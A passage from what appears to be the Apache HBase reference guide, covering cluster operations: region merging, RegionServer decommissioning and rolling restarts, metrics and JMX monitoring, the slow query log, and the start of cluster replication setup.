0.98.4.\n\nYou must specify either `-write` or `-update-read` as the first option.\nFor general usage instructions, pass the `-h` option.\n\nTo run LoadTestTool prior to HBase 0.98.4, issue the command +hbase\n org.apache.hadoop.hbase.util.LoadTestTool+.\n\nThe LoadTestTool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLs and visibility labels, testing security-related features, the ability to specify the number of regions per server, tests for multi-get RPC calls, and tests relating to replication.\n\n[[ops.regionmgt]]\n== Region Management\n\n[[ops.regionmgt.majorcompact]]\n=== Major Compaction\n\nMajor compactions can be requested via the HBase shell or link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Admin.html#majorCompact-org.apache.hadoop.hbase.TableName-[Admin.majorCompact].\n\nNote: major compactions do NOT do region merges.\nSee <<compaction,compaction>> for more information about compactions.\n
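\nFor example, requesting a major compaction of a table from the Java client looks like the following minimal sketch (the table name is illustrative; note that `majorCompact` is asynchronous and returns before the compaction completes):\n\n[source,java]\n----\nimport java.io.IOException;\nimport org.apache.hadoop.conf.Configuration;\nimport org.apache.hadoop.hbase.HBaseConfiguration;\nimport org.apache.hadoop.hbase.TableName;\nimport org.apache.hadoop.hbase.client.Admin;\nimport org.apache.hadoop.hbase.client.Connection;\nimport org.apache.hadoop.hbase.client.ConnectionFactory;\n\npublic class MajorCompactExample {\n  public static void main(String[] args) throws IOException {\n    Configuration conf = HBaseConfiguration.create();\n    try (Connection connection = ConnectionFactory.createConnection(conf);\n         Admin admin = connection.getAdmin()) {\n      \/\/ Queues a major compaction of every region of the table.\n      admin.majorCompact(TableName.valueOf(\"myTable\"));\n    }\n  }\n}\n----\n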
\n[[ops.regionmgt.merge]]\n=== Merge\n\nMerge is a utility that can merge adjoining regions in the same table (see org.apache.hadoop.hbase.util.Merge).\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.util.Merge <tablename> <region1> <region2>\n----\n\nIf you feel you have too many regions and want to consolidate them, Merge is the utility you need.\nMerge must be run when the cluster is down.\nSee the link:https:\/\/web.archive.org\/web\/20111231002503\/http:\/\/ofps.oreilly.com\/titles\/9781449396107\/performance.html[O'Reilly HBase\n Book] for an example of usage.\n\nYou will need to pass 3 parameters to this application.\nThe first one is the table name.\nThe second one is the fully qualified name of the first region to merge, like \"table_name,\\x0A,1342956111995.7cef47f192318ba7ccc75b1bbf27a82b.\". The third one is the fully qualified name for the second region to merge.\n\nAdditionally, there is a Ruby script attached to link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-1621[HBASE-1621] for region merging.\n\n[[node.management]]\n== Node Management\n\n[[decommission]]\n=== Node Decommission\n\nYou can stop an individual RegionServer by running the following script in the HBase directory on the particular node:\n\n----\n$ .\/bin\/hbase-daemon.sh stop regionserver\n----\n\nThe RegionServer will first close all regions and then shut itself down.\nOn shutdown, the RegionServer's ephemeral node in ZooKeeper will expire.\nThe master will notice the RegionServer gone and will treat it as a 'crashed' server; it will reassign the regions the RegionServer was carrying.\n\n.Disable the Load Balancer before Decommissioning a node\n[NOTE]\n====\nIf the load balancer runs while a node is shutting down, then there could be contention between the Load Balancer and the Master's recovery of the just decommissioned RegionServer.\nAvoid any problems by disabling the balancer first.\nSee <<lb,lb>> below.\n====\n\n.Kill Node Tool\n[NOTE]\n====\nIn hbase-2.0, in the bin directory, we added a script named _considerAsDead.sh_ that can be used to kill a regionserver.\nHardware issues could be detected by specialized monitoring tools before the zookeeper timeout has expired. _considerAsDead.sh_ is a simple function to mark a RegionServer as dead.\nIt deletes all the znodes of the server, starting the recovery process.\nPlug the script into your monitoring\/fault detection tools to initiate faster failover.\nBe careful how you use this disruptive tool.\nCopy the script if you need to make use of it in a version of hbase previous to hbase-2.0.\n====\n\nA downside to the above stop of a RegionServer is that regions could be offline for a good period of time.\nRegions are closed in order.\nIf there are many regions on the server, the first region to close may not be back online until all regions close and the master notices the RegionServer's znode gone.\nIn Apache HBase 0.90.2, we added a facility for having a node gradually shed its load and then shut itself down.\nApache HBase 0.90.2 added the _graceful_stop.sh_ script.\nHere is its usage:\n\n----\n$ .\/bin\/graceful_stop.sh\nUsage: graceful_stop.sh [--config <conf-dir>] [--restart] [--reload] [--thrift] [--rest] <hostname>\n thrift If we should stop\/start thrift before\/after the hbase stop\/start\n rest If we should stop\/start rest before\/after the hbase stop\/start\n restart If we should restart after graceful stop\n reload Move offloaded regions back on to the stopped server\n debug Print extra debug information\n hostname Hostname of server we are to stop\n----\n\nTo decommission a loaded RegionServer, run the following: +$\n .\/bin\/graceful_stop.sh HOSTNAME+ where `HOSTNAME` is the host carrying the RegionServer you would decommission.\n\n.On `HOSTNAME`\n[NOTE]\n====\nThe `HOSTNAME` passed to _graceful_stop.sh_ must match the hostname that hbase is using to identify RegionServers.\nCheck the list of RegionServers in the master UI for how HBase is referring to servers.\nIt's usually a hostname but can also be an FQDN.\nWhatever HBase is using, this is what you should pass to the _graceful_stop.sh_ decommission script.\nIf you pass IPs, the script is not yet smart enough to make a hostname (or FQDN) of it, and so it will fail when it checks if the server is currently running; the graceful unloading of regions will not run.\n====\n\nThe 
_graceful_stop.sh_ script will move the regions off the decommissioned RegionServer one at a time to minimize region churn.\nIt will verify the region deployed in the new location before it moves the next region, and so on, until the decommissioned server is carrying zero regions.\nAt this point, _graceful_stop.sh_ tells the RegionServer to `stop`.\nThe master will at this point notice the RegionServer gone, but all regions will have already been redeployed, and because the RegionServer went down cleanly, there will be no WAL logs to split.\n\n[[lb]]\n.Load Balancer\n[NOTE]\n====\nIt is assumed that the Region Load Balancer is disabled while the `graceful_stop` script runs (otherwise the balancer and the decommission script will end up fighting over region deployments). Use the shell to disable the balancer:\n\n[source]\n----\nhbase(main):001:0> balance_switch false\ntrue\n0 row(s) in 0.3590 seconds\n----\n\nThis turns the balancer OFF.\nTo reenable, do:\n\n[source]\n----\nhbase(main):001:0> balance_switch true\nfalse\n0 row(s) in 0.3590 seconds\n----\n\nThe `graceful_stop` script will check the balancer and, if it is enabled, will turn it off before it goes to work.\nIf it exits prematurely because of an error, it will not have reset the balancer.\nHence, it is better to manage the balancer apart from `graceful_stop`, reenabling it after you are done with graceful_stop.\n====\n
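\nThe balancer can also be toggled from Java through the Admin API. Here is a minimal sketch, assuming the HBase 1.x `Admin#setBalancerRunning(boolean, boolean)` signature (renamed `balancerSwitch` in 2.0):\n\n[source,java]\n----\nimport java.io.IOException;\nimport org.apache.hadoop.conf.Configuration;\nimport org.apache.hadoop.hbase.HBaseConfiguration;\nimport org.apache.hadoop.hbase.client.Admin;\nimport org.apache.hadoop.hbase.client.Connection;\nimport org.apache.hadoop.hbase.client.ConnectionFactory;\n\npublic class BalancerSwitchExample {\n  public static void main(String[] args) throws IOException {\n    Configuration conf = HBaseConfiguration.create();\n    try (Connection connection = ConnectionFactory.createConnection(conf);\n         Admin admin = connection.getAdmin()) {\n      \/\/ Disable the balancer; returns the previous state, like balance_switch in the shell.\n      boolean previous = admin.setBalancerRunning(false, true);\n      System.out.println(\"Balancer was previously \" + (previous ? \"on\" : \"off\"));\n    }\n  }\n}\n----\n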
\n[[draining.servers]]\n==== Decommissioning several RegionServers concurrently\n\nIf you have a large cluster, you may want to decommission more than one machine at a time by gracefully stopping multiple RegionServers concurrently.\nTo gracefully drain multiple regionservers at the same time, RegionServers can be put into a \"draining\" state.\nThis is done by marking a RegionServer as a draining node by creating an entry in ZooKeeper under the _hbase_root\/draining_ znode.\nThis znode has the format `name,port,startcode`, just like the regionserver entries under the _hbase_root\/rs_ znode.\n\nWithout this facility, decommissioning multiple nodes may be non-optimal because regions that are being drained from one region server may be moved to other regionservers that are also draining.\nMarking RegionServers to be in the draining state prevents this from happening.\nSee this link:http:\/\/inchoate-clatter.blogspot.com\/2012\/03\/hbase-ops-automation.html[blog\n post] for more details.\n\n[[bad.disk]]\n==== Bad or Failing Disk\n\nIt is good to have <<dfs.datanode.failed.volumes.tolerated,dfs.datanode.failed.volumes.tolerated>> set if you have a decent number of disks per machine, for the case where a disk plain dies.\nBut usually disks do the \"John Wayne\" -- i.e.\ntake a while to go down spewing errors in _dmesg_ -- or for some reason, run much slower than their companions.\nIn this case you want to decommission the disk.\nYou have two options.\nYou can link:https:\/\/wiki.apache.org\/hadoop\/FAQ#I_want_to_make_a_large_cluster_smaller_by_taking_out_a_bunch_of_nodes_simultaneously._How_can_this_be_done.3F[decommission\n the datanode] or, less disruptively in that only the bad disk's data will be rereplicated, you can stop the datanode, unmount the bad volume (you can't umount a volume while the datanode is using it), and then restart the datanode (presuming you have set dfs.datanode.failed.volumes.tolerated > 0). The regionserver will throw some errors in its logs as it recalibrates where to get its data from -- it will likely roll its WAL log too -- but in general, aside from some latency spikes, it should keep on chugging.\n\n.Short Circuit Reads\n[NOTE]\n====\nIf you are doing short-circuit reads, you will have to move the regions off the regionserver before you stop the datanode; with short-circuit reads, even if the files are chmod'd so the regionserver cannot access them, because it already has the files open it will be able to keep reading the file blocks from the bad disk even though the datanode is down.\nMove the regions back after you restart the datanode.\n====\n\n[[rolling]]\n=== Rolling Restart\n\nSome cluster configuration changes require either the entire cluster, or the RegionServers, to be restarted in order to pick up the changes.\nIn addition, rolling restarts are supported for upgrading to a minor or maintenance release, and to a major release if at all possible.\nSee the release notes for the release you want to upgrade to, to find out about limitations to the ability to perform a rolling upgrade.\n\nThere are multiple ways to restart your cluster nodes, depending on your situation.\nThese methods are detailed below.\n\n==== Using the `rolling-restart.sh` Script\n\nHBase ships with a script, _bin\/rolling-restart.sh_, that allows you to perform rolling restarts on the entire cluster, the master only, or the RegionServers only.\nThe script is provided as a template for your own script, and is not explicitly tested.\nIt requires password-less SSH login to be configured and assumes that you have deployed using a tarball.\nThe script requires you to set some environment variables before running it.\nExamine the script and modify it to suit your needs.\n\n._rolling-restart.sh_ General Usage\n====\n----\n\n$ .\/bin\/rolling-restart.sh --help\nUsage: rolling-restart.sh [--config <hbase-confdir>] [--rs-only] [--master-only] [--graceful] [--maxthreads xx]\n----\n====\n\nRolling Restart on RegionServers Only::\n To perform a rolling restart on the RegionServers only, use the `--rs-only` option.\n This might be necessary if you need to reboot the individual RegionServer or if you make a configuration change that only affects RegionServers and not the other HBase processes.\n\nRolling Restart on Masters Only::\n To perform a rolling restart on the active and backup Masters, use the `--master-only` option.\n You might use this if you know that your configuration change only affects the Master and not the RegionServers, or if you need to restart the server where the active Master is running.\n\nGraceful Restart::\n If you specify the `--graceful` option, RegionServers are restarted using the _bin\/graceful_stop.sh_ script, which moves regions off a RegionServer before restarting it.\n This is safer, but can delay the restart.\n\nLimiting the Number of Threads::\n To limit the rolling restart to using only a specific number of threads, use the `--maxthreads` option.\n\n[[rolling.restart.manual]]\n==== Manual Rolling Restart\n\nTo retain more control over the process, you may wish to manually do a rolling restart across your cluster.\nThis uses the _graceful_stop.sh_ script (see <<decommission,decommission>>).\nIn this method, you can restart each RegionServer individually and then move its old regions back into place, retaining locality.\nIf you also need to restart the Master, you need to do it separately, and restart the Master before restarting the RegionServers using this method.\nThe following is an example of 
such a command.\nYou may need to tailor it to your environment.\nThis script does a rolling restart of RegionServers only.\nIt disables the load balancer before moving the regions.\n\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i; done &> \/tmp\/log.txt &\n----\n\nMonitor the output of the _\/tmp\/log.txt_ file to follow the progress of the script.\n\n==== Logic for Crafting Your Own Rolling Restart Script\n\nUse the following guidelines if you want to create your own rolling restart script.\n\n. Extract the new release, verify its configuration, and synchronize it to all nodes of your cluster using `rsync`, `scp`, or another secure synchronization mechanism.\n. Use the hbck utility to ensure that the cluster is consistent.\n+\n----\n\n$ .\/bin\/hbase hbck\n----\n+\nPerform repairs if required.\nSee <<hbck,hbck>> for details.\n\n. Restart the master first.\n You may need to modify these commands if your new HBase directory is different from the old one, such as for an upgrade.\n+\n----\n\n$ .\/bin\/hbase-daemon.sh stop master; .\/bin\/hbase-daemon.sh start master\n----\n\n. Gracefully restart each RegionServer, using a script such as the following, from the Master.\n+\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i; done &> \/tmp\/log.txt &\n----\n+\nIf you are running Thrift or REST servers, pass the --thrift or --rest options.\nFor other available options, run the `bin\/graceful_stop.sh --help` command.\n+\nIt is important to drain HBase regions slowly when restarting multiple RegionServers.\nOtherwise, multiple regions go offline simultaneously and must be reassigned to other nodes, which may also go offline soon.\nThis can negatively affect performance.\nYou can inject delays into the script above, for instance, by adding a Shell command such as `sleep`.\nTo wait for 5 minutes between each RegionServer restart, modify the above script to the following:\n+\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i; sleep 5m; done &> \/tmp\/log.txt &\n----\n\n. Restart the Master again, to clear out the dead servers list and re-enable the load balancer.\n. 
\n\n[[adding.new.node]]\n=== Adding a New Node\n\nAdding a new regionserver in HBase is essentially free: you simply start it like this: `$ .\/bin\/hbase-daemon.sh start regionserver` and it will register itself with the master.\nIdeally you also started a DataNode on the same machine so that the RS can eventually start to have local files.\nIf you rely on ssh to start your daemons, don't forget to add the new hostname in _conf\/regionservers_ on the master.\n\nAt this point the region server isn't serving data because no regions have moved to it yet.\nIf the balancer is enabled, it will start moving regions to the new RS.\nOn a small\/medium cluster this can have a very adverse effect on latency as a lot of regions will be offline at the same time.\nIt is thus recommended to disable the balancer the same way it's done when decommissioning a node and move the regions manually (or even better, using a script that moves them one by one, as sketched at the end of this section).\n\nThe moved regions will all have 0% locality and won't have any blocks in cache, so the region server will have to use the network to serve requests.\nApart from resulting in higher latency, it may also use all of your network card's capacity.\nFor practical purposes, consider that a standard 1GigE NIC won't be able to read much more than _100MB\/s_.\nIn this case, or if you are in an OLAP environment and require locality, it is recommended to major compact the moved regions.
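\n\nAs an illustration of the one-region-at-a-time approach mentioned above, the following HBase Shell session disables the balancer and moves regions explicitly. The encoded region names and the target server name (in `host,port,startcode` form) are placeholders to substitute from your own cluster.\n\n----\n\nhbase> balance_switch false\nhbase> move 'ENCODED_REGIONNAME_1', 'new-rs.example.com,16020,1469900000000'\nhbase> move 'ENCODED_REGIONNAME_2', 'new-rs.example.com,16020,1469900000000'\n# ... continue one region at a time, pausing between moves ...\nhbase> balance_switch true\n----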
\n\n[[hbase_metrics]]\n== HBase Metrics\n\nHBase emits metrics which adhere to the link:https:\/\/hadoop.apache.org\/docs\/stable\/hadoop-project-dist\/hadoop-common\/Metrics.html[Hadoop Metrics] API.\nStarting with HBase 0.95footnote:[The Metrics system was redone in\n HBase 0.96. See Migration\n to the New Metrics Hotness \u2013 Metrics2 by Elliot Clark for details], HBase is configured to emit a default set of metrics with a default sampling period of every 10 seconds.\nYou can use HBase metrics in conjunction with Ganglia.\nYou can also filter which metrics are emitted and extend the metrics framework to capture custom metrics appropriate for your environment.\n\n=== Metric Setup\n\nFor HBase 0.95 and newer, HBase ships with a default metrics configuration, or [firstterm]_sink_.\nThis includes a wide variety of individual metrics, and emits them every 10 seconds by default.\nTo configure metrics for a given region server, edit the _conf\/hadoop-metrics2-hbase.properties_ file.\nRestart the region server for the changes to take effect.\n\nTo change the sampling rate for the default sink, edit the line beginning with `*.period`.\nTo filter which metrics are emitted or to extend the metrics framework, see https:\/\/hadoop.apache.org\/docs\/current\/api\/org\/apache\/hadoop\/metrics2\/package-summary.html\n\n.HBase Metrics and Ganglia\n[NOTE]\n====\nBy default, HBase emits a large number of metrics per region server.\nGanglia may have difficulty processing all these metrics.\nConsider increasing the capacity of the Ganglia server or reducing the number of metrics emitted by HBase.\nSee link:https:\/\/hadoop.apache.org\/docs\/current\/api\/org\/apache\/hadoop\/metrics2\/package-summary.html#filtering[Metrics Filtering].\n====\n\n=== Disabling Metrics\n\nTo disable metrics for a region server, edit the _conf\/hadoop-metrics2-hbase.properties_ file and comment out any uncommented lines.\nRestart the region server for the changes to take effect.\n\n[[discovering.available.metrics]]\n=== Discovering Available Metrics\n\nRather than listing each metric which HBase emits by default, you can browse through the available metrics, either as a JSON output or via JMX.\nDifferent metrics are exposed for the Master process and each region server process.\n\n.Procedure: Access a JSON Output of Available Metrics\n. After starting HBase, access the region server's web UI, at pass:[http:\/\/REGIONSERVER_HOSTNAME:60030] by default (or port 16030 in HBase 1.0+).\n. Click the [label]#Metrics Dump# link near the top.\n The metrics for the region server are presented as a dump of the JMX bean in JSON format.\n This will dump out all metrics names and their values.\n To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http:\/\/REGIONSERVER_HOSTNAME:60030\/jmx?description=true].\n Not all beans and attributes have descriptions.\n. To view metrics for the Master, connect to the Master's web UI instead (defaults to pass:[http:\/\/localhost:60010] or port 16010 in HBase 1.0+) and click its [label]#Metrics\n Dump# link.\n To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http:\/\/MASTER_HOSTNAME:60010\/jmx?description=true].\n Not all beans and attributes have descriptions.
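\n\nThe JSON dump is also easy to fetch from scripts. The following sketch assumes a region server on `localhost` using the HBase 1.0+ default port; the `qry` parameter, which narrows the dump to a single bean, is a feature of the underlying Hadoop JMX servlet.\n\n----\n\n$ curl 'http:\/\/localhost:16030\/jmx?description=true'\n\n$ curl 'http:\/\/localhost:16030\/jmx?qry=Hadoop:service=HBase,name=RegionServer,sub=Server'\n----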
\n\nYou can use many different tools to view JMX content by browsing MBeans.\nThis procedure uses `jvisualvm`, which is an application usually available in the JDK.\n\n.Procedure: Browse the JMX Output of Available Metrics\n. Start HBase, if it is not already running.\n. Run the `jvisualvm` command on a host with a GUI display.\n You can launch it from the command line or another method appropriate for your operating system.\n. Be sure the [label]#VisualVM-MBeans# plugin is installed. Browse to *Tools -> Plugins*. Click [label]#Installed# and check whether the plugin is listed.\n If not, click [label]#Available Plugins#, select it, and click btn:[Install].\n When finished, click btn:[Close].\n. To view details for a given HBase process, double-click the process in the [label]#Local# sub-tree in the left-hand panel.\n A detailed view opens in the right-hand panel.\n Click the [label]#MBeans# tab which appears as a tab in the top of the right-hand panel.\n. To access the HBase metrics, navigate to the appropriate sub-bean:\n* Master\n* RegionServer\n\n. The name of each metric and its current value are displayed in the [label]#Attributes# tab.\n For a view which includes more details, including the description of each attribute, click the [label]#Metadata# tab.\n\n=== Units of Measure for Metrics\n\nDifferent metrics are expressed in different units, as appropriate.\nOften, the unit of measure is in the name (as in the metric `shippedKBs`). Otherwise, use the following guidelines.\nWhen in doubt, you may need to examine the source for a given metric.\n\n* Metrics that refer to a point in time are usually expressed as a timestamp.\n* Metrics that refer to an age (such as `ageOfLastShippedOp`) are usually expressed in milliseconds.\n* Metrics that refer to memory sizes are in bytes.\n* Sizes of queues (such as `sizeOfLogQueue`) are expressed as the number of items in the queue.\n Determine the size by multiplying by the block size (default is 64 MB in HDFS).\n* Metrics that refer to things like the number of a given type of operations (such as `logEditsRead`) are expressed as an integer.\n\n[[master_metrics]]\n=== Most Important Master Metrics\n\nNote: Counts are usually over the last metrics reporting interval.\n\nhbase.master.numRegionServers::\n Number of live regionservers\n\nhbase.master.numDeadRegionServers::\n Number of dead regionservers\n\nhbase.master.ritCount::\n The number of regions in transition\n\nhbase.master.ritCountOverThreshold::\n The number of regions that have been in transition longer than a threshold time (default: 60 seconds)\n\nhbase.master.ritOldestAge::\n The age of the longest region in transition, in milliseconds\n\n[[rs_metrics]]\n=== Most Important RegionServer Metrics\n\nNote: Counts are usually over the last metrics reporting interval.\n\nhbase.regionserver.regionCount::\n The number of regions hosted by the regionserver\n\nhbase.regionserver.storeFileCount::\n The number of store files on disk currently managed by the regionserver\n\nhbase.regionserver.storeFileSize::\n Aggregate size of the store files on disk\n\nhbase.regionserver.hlogFileCount::\n The number of write ahead logs not yet archived\n\nhbase.regionserver.totalRequestCount::\n The total number of requests received\n\nhbase.regionserver.readRequestCount::\n The number of read requests received\n\nhbase.regionserver.writeRequestCount::\n The number of write requests received\n\nhbase.regionserver.numOpenConnections::\n The number of open connections at the RPC layer\n\nhbase.regionserver.numActiveHandler::\n The number of RPC handlers actively servicing requests\n\nhbase.regionserver.numCallsInGeneralQueue::\n The number of currently enqueued user requests\n\nhbase.regionserver.numCallsInReplicationQueue::\n The number of currently enqueued operations 
received from replication\n\nhbase.regionserver.numCallsInPriorityQueue::\n The number of currently enqueued priority (internal housekeeping) requests\n\nhbase.regionserver.flushQueueLength::\n Current depth of the memstore flush queue.\n If increasing, we are falling behind with clearing memstores out to HDFS.\n\nhbase.regionserver.updatesBlockedTime::\n Number of milliseconds updates have been blocked so the memstore can be flushed\n\nhbase.regionserver.compactionQueueLength::\n Current depth of the compaction request queue.\n If increasing, we are falling behind with storefile compaction.\n\nhbase.regionserver.blockCacheHitCount::\n The number of block cache hits\n\nhbase.regionserver.blockCacheMissCount::\n The number of block cache misses\n\nhbase.regionserver.blockCacheExpressHitPercent::\n The percent of the time that requests with the cache turned on hit the cache\n\nhbase.regionserver.percentFilesLocal::\n Percent of store file data that can be read from the local DataNode, 0-100\n\nhbase.regionserver.<op>_<measure>::\n Operation latencies, where <op> is one of Append, Delete, Mutate, Get, Replay, Increment; and where <measure> is one of min, max, mean, median, 75th_percentile, 95th_percentile, 99th_percentile\n\nhbase.regionserver.slow<op>Count::\n The number of operations we thought were slow, where <op> is one of the list above\n\nhbase.regionserver.GcTimeMillis::\n Time spent in garbage collection, in milliseconds\n\nhbase.regionserver.GcTimeMillisParNew::\n Time spent in garbage collection of the young generation, in milliseconds\n\nhbase.regionserver.GcTimeMillisConcurrentMarkSweep::\n Time spent in garbage collection of the old generation, in milliseconds\n\nhbase.regionserver.authenticationSuccesses::\n Number of client connections where authentication succeeded\n\nhbase.regionserver.authenticationFailures::\n Number of client connection authentication failures\n\nhbase.regionserver.mutationsWithoutWALCount::\n Count of writes submitted with a flag indicating they should bypass the write ahead log\n\n[[ops.monitoring]]\n== HBase Monitoring\n\n[[ops.monitoring.overview]]\n=== Overview\n\nThe following metrics are arguably the most important to monitor for each RegionServer for \"macro monitoring\", preferably with a system like link:http:\/\/opentsdb.net\/[OpenTSDB].\nIf your cluster is having performance issues, it's likely that you'll see something unusual with this group.\n\nHBase::\n * See <<rs_metrics,rs metrics>>\n\nOS::\n * IO Wait\n * User CPU\n\nJava::\n * GC\n\nFor more information on HBase metrics, see <<hbase_metrics,hbase metrics>>.\n\n[[ops.slow.query]]\n=== Slow Query Log\n\nThe HBase slow query log consists of parseable JSON structures describing the properties of those client operations (Gets, Puts, Deletes, etc.) that either took too long to run, or produced too much output.\nThe thresholds for \"too long to run\" and \"too much output\" are configurable, as described below.\nThe output is produced inline in the main region server logs so that it is easy to discover further details from context with other logged events.\nIt is also prepended with identifying tags `(responseTooSlow)`, `(responseTooLarge)`, `(operationTooSlow)`, and `(operationTooLarge)` in order to enable easy filtering with grep, in case the user desires to see only slow queries.
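\n\nFor example, to pull only the slow-query entries out of a region server log with grep (the log file path here is an assumption; substitute your own):\n\n----\n\n$ grep -E 'operationTooSlow|operationTooLarge|responseTooSlow|responseTooLarge' \/var\/log\/hbase\/hbase-regionserver.log\n----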
\n\n==== Configuration\n\nThere are two configuration knobs that can be used to adjust the thresholds for when queries are logged.\n\n* `hbase.ipc.warn.response.time` Maximum number of milliseconds that a query can be run without being logged.\n Defaults to 10000, or 10 seconds.\n Can be set to -1 to disable logging by time.\n* `hbase.ipc.warn.response.size` Maximum byte size of response that a query can return without being logged.\n Defaults to 100 megabytes.\n Can be set to -1 to disable logging by size.\n\n==== Metrics\n\nThe slow query log exposes two metrics to JMX.\n\n* `hadoop.regionserver_rpc_slowResponse`, a global metric reflecting the durations of all responses that triggered logging.\n* `hadoop.regionserver_rpc_methodName.aboveOneSec`, a metric reflecting the durations of all responses that lasted for more than one second.\n\n==== Output\n\nThe output is tagged with the operation, e.g. `(operationTooSlow)`, if the call was a client operation, such as a Put, Get, or Delete, for which we expose detailed fingerprint information.\nIf not, it is tagged `(responseTooSlow)` and still produces parseable JSON output, but with less verbose information solely regarding its duration and size in the RPC itself. `TooLarge` is substituted for `TooSlow` if the response size triggered the logging, with `TooLarge` appearing even in the case that both size and duration triggered logging.\n\n==== Example\n\n\n[source]\n----\n2011-09-08 10:01:25,824 WARN org.apache.hadoop.ipc.HBaseServer: (operationTooSlow): {\"tables\":{\"riley2\":{\"puts\":[{\"totalColumns\":11,\"families\":{\"actions\":[{\"timestamp\":1315501284459,\"qualifier\":\"0\",\"vlen\":9667580},{\"timestamp\":1315501284459,\"qualifier\":\"1\",\"vlen\":10122412},{\"timestamp\":1315501284459,\"qualifier\":\"2\",\"vlen\":11104617},{\"timestamp\":1315501284459,\"qualifier\":\"3\",\"vlen\":13430635}]},\"row\":\"cfcd208495d565ef66e7dff9f98764da:0\"}],\"families\":[\"actions\"]}},\"processingtimems\":956,\"client\":\"10.47.34.63:33623\",\"starttimems\":1315501284456,\"queuetimems\":0,\"totalPuts\":1,\"class\":\"HRegionServer\",\"responsesize\":0,\"method\":\"multiPut\"}\n----\n\nNote that everything inside the \"tables\" structure is output produced by MultiPut's fingerprint, while the rest of the information is RPC-specific, such as processing time and client IP\/port.\nOther client operations follow the same pattern and the same general structure, with necessary differences due to the nature of the individual operations.\nIn the case that the call is not a client operation, that detailed fingerprint information will be completely absent.\n\nThis particular example would indicate that the likely cause of slowness is simply a very large (on the order of 100MB) multiput, as we can tell by the \"vlen,\" or value length, fields of each put in the multiPut.\n\n=== Block Cache Monitoring\n\nStarting with HBase 0.98, the HBase Web UI includes the ability to monitor and report on the performance of the block 
cache.\nTo view the block cache reports, see the Block Cache section of the region server's Web UI.\nFollowing are a few examples of the reporting capabilities.\n\n.Basic Info\nimage::bc_basic.png[]\n\n.Config\nimage::bc_config.png[]\n\n.Stats\nimage::bc_stats.png[]\n\n.L1 and L2\nimage::bc_l1.png[]\n\nThis is not an exhaustive list of all the screens and reports available.\nHave a look in the Web UI.\n\n== Cluster Replication\n\nNOTE: This information was previously available at\nlink:https:\/\/hbase.apache.org\/0.94\/replication.html[Cluster Replication].\n\nHBase provides a cluster replication mechanism which allows you to keep one cluster's state synchronized with that of another cluster, using the write-ahead log (WAL) of the source cluster to propagate the changes.\nSome use cases for cluster replication include:\n\n* Backup and disaster recovery\n* Data aggregation\n* Geographic data distribution\n* Online data ingestion combined with offline data analytics\n\nNOTE: Replication is enabled at the granularity of the column family.\nBefore enabling replication for a column family, create the table and all column families to be replicated, on the destination cluster.\n\n=== Replication Overview\n\nCluster replication uses a source-push methodology.\nAn HBase cluster can be a source (also called master or active, meaning that it is the originator of new data), a destination (also called slave or passive, meaning that it receives data via replication), or can fulfill both roles at once.\nReplication is asynchronous, and the goal of replication is eventual consistency.\nWhen the source receives an edit to a column family with replication enabled, that edit is propagated to all destination clusters using the WAL for that column family on the RegionServer managing the relevant region.\n\nWhen data is replicated from one cluster to another, the original source of the data is tracked via a cluster ID which is part of the metadata.\nIn HBase 0.96 and newer (link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-7709[HBASE-7709]), all clusters which have already consumed the data are also tracked.\nThis prevents replication loops.\n\nThe WALs for each region server must be kept in HDFS as long as they are needed to replicate data to any slave cluster.\nEach region server reads from the oldest log it needs to replicate and keeps track of its progress processing WALs inside ZooKeeper to simplify failure recovery.\nThe position marker which indicates a slave cluster's progress, as well as the queue of WALs to process, may be different for every slave cluster.\n\nThe clusters participating in replication can be of different sizes.\nThe master cluster relies on randomization to attempt to balance the stream of replication on the slave clusters.\nIt is expected that the slave cluster has storage capacity to hold the replicated data, as well as any data it is responsible for ingesting.\nIf a slave cluster does run out of room, or is inaccessible for other reasons, it throws an error and the master retains the WAL and retries the replication at intervals.\n\n.Consistency Across Replicated Clusters\n[WARNING]\n====\nHow your application builds on top of the HBase API matters when replication is in play. HBase's replication system provides at-least-once delivery of client edits for an enabled column family to each configured destination cluster. In the event of failure to reach a given destination, the replication system will retry sending edits in a way that might repeat a given message. 
Furthermore, there is not a guaranteed order of delivery for client edits. In the event of a RegionServer failing, recovery of the replication queue happens independently of recovery of the individual regions that server was previously handling. This means that it is possible for the not-yet-replicated edits to be serviced by a RegionServer that is currently slower to replicate than the one that handles edits from after the failure.\n\nThe combination of these two properties (at-least-once delivery and the lack of message ordering) means that some destination clusters may end up in a different state if your application makes use of operations that are not idempotent, e.g. Increments.\n====\n\n.Terminology Changes\n[NOTE]\n====\nPreviously, terms such as [firstterm]_master-master_, [firstterm]_master-slave_, and [firstterm]_cyclical_ were used to describe replication relationships in HBase.\nThese terms added confusion, and have been abandoned in favor of discussions about cluster topologies appropriate for different scenarios.\n====\n\n.Cluster Topologies\n* A central source cluster might propagate changes out to multiple destination clusters, for failover or due to geographic distribution.\n* A source cluster might push changes to a destination cluster, which might also push its own changes back to the original cluster.\n* Many different low-latency clusters might push changes to one centralized cluster for backup or resource-intensive data analytics jobs.\n The processed data might then be replicated back to the low-latency clusters.\n\nMultiple levels of replication may be chained together to suit your organization's needs.\nThe following diagram shows a hypothetical scenario.\nUse the arrows to follow the data paths.\n\n.Example of a Complex Cluster Replication Configuration\nimage::hbase_replication_diagram.jpg[]\n\nHBase replication borrows many concepts from the [firstterm]_statement-based replication_ design used by MySQL.\nInstead of SQL statements, entire WALEdits (consisting of multiple cell inserts coming from Put and Delete operations on the clients) are replicated in order to maintain atomicity.\n\n[[hbase.replication.management]]\n=== Managing and Configuring Cluster Replication\n\n.Cluster Configuration Overview\n\n. Configure and start the source and destination clusters.\n Create tables with the same names and column families on both the source and destination clusters, so that the destination cluster knows where to store data it will receive.\n. All hosts in the source and destination clusters should be reachable by each other.\n. If both clusters use the same ZooKeeper cluster, you must use a different `zookeeper.znode.parent`, because they cannot write in the same folder.\n. On the source cluster, in 